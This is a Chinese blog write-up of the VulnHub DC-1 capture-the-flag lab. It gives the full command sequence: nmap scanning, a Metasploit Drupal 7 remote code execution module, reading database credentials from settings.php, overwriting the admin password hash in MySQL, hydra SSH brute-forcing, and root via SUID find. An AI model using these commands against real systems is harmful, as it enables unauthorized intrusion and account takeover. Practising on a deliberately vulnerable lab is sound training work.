DC-1
DC-1 是一个专门建造的易受攻击的实验室,目的是在渗透测试领域获得经验。
它旨在为初学者提供挑战,但它的难易程度取决于您的技能和知识,以及您的学习能力。
要成功完成此挑战,您将需要 Linux 技能、熟悉 Linux 命令行以及使用基本渗透测试工具的经验,例如可以在 Kali Linux 或 Parrot Security OS 上找到的工具。
获得 root 的方法有多种,我提供了一些flag,其中包含为初学者提供的线索。
总共有五个标志,但最终目的是在 root 的主目录中找到并读取标志。您甚至不需要成为 root 用户即可执行此操作,但是,您将需要 root 用户权限。
根据您的技能水平,您可以跳过查找这些标志中的大部分并直接获取 root 权限。
初学者可能会遇到他们以前从未遇到过的挑战,但谷歌搜索应该足以获得完成这一挑战所需的信息。
信息收集
nmap 192.168.157.0/24 //扫描网段
nmap -sV 192.168.157.142 //扫描版本详情
Drupal 7.x漏洞拿flag1
开放了80端口,那先访问网站
检测到是由使用PHP
语言编写的开源内容管理系统Drupal
搭建的,并且由Wappalyzer
得知版本为7.X,所以直接使用searchsploit
命令在漏洞库中搜索此版本是否有漏洞可以利用
searchsploit Drupal 7.X
有一个PHP远程代码执行的漏洞,直接用msf打
msfconsole
search Drupal 7.X
use 0
show options //查看参数设置
set RHOSTS 192.168.157.142
run
shell
#由于得到的不是一个完整的shell环境,所以我们所以pyhton中的pty模块反弹一个完整的shell环境
python -c 'import pty;pty.spawn("/bin/bash")'
得到flag1.txt
搜寻配置文件拿flag2
根据flag1的提示,去看CMS的config配置文件,Drupal7的配置文件为 sites/default/settings.php
cat sites/default/settings.php
得到flag2以及数据库信息
flag2提示爆破和目录扫描并不是唯一获得后台的方法(并且你需要访问权限),下面这些认证信息你如何使用)
修改密码进网站拿flag3
连接数据库
mysql -udbuser -pR0ck3t
show databases;
use drupaldb;
show tables;
select * from users;
查看数据表 (这里的test是我测试时注册的)
密码是加盐的,一般情况下难以破解,这里选择改密码的方式
首先生成自定密码的加盐哈希值。回到网站的目录下执行php scripts/password-hash.sh 密码
命令生成
php scripts/password-hash.sh passwd
重新进入数据库修改密码,确认修改成功
update users set pass="$S$DgOmdbqyyWW6Du5QgThyTT1YoMlC5Pm.piv5Aprc9pejK74CobpC" where name='admin';
admin用户登录成功
在Dashboard得到flag3
查看目录拿flag4
passwd
与 shadow
是 /etc
下的目录
cat /etc/passwd
cat /etc/shadow
/etc/shadow
无法查看,权限不够,在etc/passwd
下发现目标靶机用户flag4
扩展思考
如何没有查看权限的话应该如何得到flag4
解决方法:
有/bin/bash ,考虑ssh连接
这里用 hydra 爆破flag4用户的密码
hydra -l flag4 -P /usr/share/john/password.lst 192.168.157.142 ssh -vV -f
-l: 登录的用户名,这里是flag4
/usr/share/john/password.lst: 要使用的密码字典文件路径
192.168.157.142: 目标主机IP
ssh: 要破解的服务,这里是ssh服务
-vV: 详细输出,显示详细的连接和破解过程
-f: 当找到可登录的密码后快速结束
提权拿flag5
查看是否具有root权限的命令
find / -perm -4000 2>/dev/null
发现find具有root权限
find -exec /bin/sh \;
提权成功,寻找flag文件
find / -name '*flag*.*'
得到flag5
简单总结
考察点较全面,思路顺畅,很有趣的一次体验,五个flag很有成就感
标签:etc,渗透,DC,192.168,密码,flag4,VulnHub,权限,root From: https://www.cnblogs.com/Mar10/p/17441299.html